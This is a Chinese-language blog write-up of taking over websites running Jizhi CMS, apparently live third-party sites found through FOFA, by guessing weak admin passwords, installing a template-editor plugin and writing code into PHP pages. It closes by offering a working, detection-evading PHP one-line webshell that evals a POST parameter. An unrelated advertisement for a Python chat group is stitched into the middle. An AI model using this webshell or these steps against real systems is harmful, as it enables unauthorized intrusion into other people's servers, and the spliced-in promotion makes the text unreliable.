记某CMS漏洞getshell _CMS漏洞

记极致CMS漏洞getshell

昨天下午比较空闲，就去搜索一些cms，突然对极致CMS感兴趣，而网上已经有一些文章对它进行分析利用，sql注入,xss,后台修改上传后缀名前台getshell等等。
于是就引起了我的兴趣想去测试一下。

信息收集还是因为自己太懒，不想搭建环境，然后就想网上有好多网站啊，随便找一个去看看。hhh然后去利用fofa去搜索。（不能随便乱日）
弱密码yyds搜索了一些网站，我们直接在url后面添加/admin.php,就直接跳到后台登录的地方。

文章插图

看到后台？！嗯~，测试了sql无果，想一想万一有弱密码呢？试一试也没有啥。
然后就测试了弱密码，你懂的。
然后成功登录~ 仿佛就看到了shell就在我面前了。

文章插图

因为之前有师傅发过前台上传文件getshell了，那我这里就不进行测试了。直接寻找另一个方法getshell 。
和平常的框架一样，登录后台之后就需要去测试功能点，然后我们就一个一个地去测试吧~（这里大概过了有40分钟 2333~）
唯一我感觉利用点就存在系统设置中的高级设置，我们可以选择上传的后缀名，不过这里是前台的上传啊，后台虽然有上传点但是一直绕过不了。难受死了，心里又不甘心在前台上传getshell，在岂不是很没有面子（傲娇）

文章插图

这里一直后台没有绕过~~~ 2333~

文章插图

如果大家在学习中遇到困难，想找一个Python学习交流环境，可以加入我们的python裙，关注小编，并私信“01”即可进裙，领取python学习资料，会节约很多时间，减少很多遇到的难题。
柳暗花明又一村想一想，如果要利用后台，那肯定是一些功能的问题，那我们就去认真找一下网站功能，找来找去就发现一个上传点，有点难受了。过了好久，突然想起了后台有一个扩展管理啊，应该说肯定可以下载一下插件来更加功能的吧。

文章插图

然后就凭着感觉和功能去看看哪些插件可以利于。发现了一个在线编辑模板的插件

文章插图

这里可能是ctfer的自觉吧~因为之前打过的ctf题基本上是可以利于编辑插件进行修改代码，就可以getshell 。话不多说就开始尝试。先下载了该模块并进行安装。
安装前我们还是看看安装说明。万一错误了怎么办！

文章插图

意思就是我们安装的时候还需要设置密码，并且该目录权限比较高,777就让我看到了shell的希望
然后就设置密码登录密码。

文章插图

成功登录之后就看到了这个页面我当时直接嗨了起了（np！！！）

文章插图

进入这个页面，那岂不是可以修改代码了，嘿嘿嘿~ 那不是shell唾手可得！
写shell连蚁剑测试了该插件的功能，发现只能修改代码还不能写文件，嗯~ 。那也简单啊，我们先在已存在的php页面上写入一句话，然后蚁剑连接，创建文件写shell,之后在删除之前修改的代码。
这里分享一个免杀的小马
<?php$a = $GLOBALS;$str = '_POST';eval/**nice**/(''. $a[$str]['cf87efe0c36a12aec113cd7982043573']. NULL);?>这里写入我们的一句话木马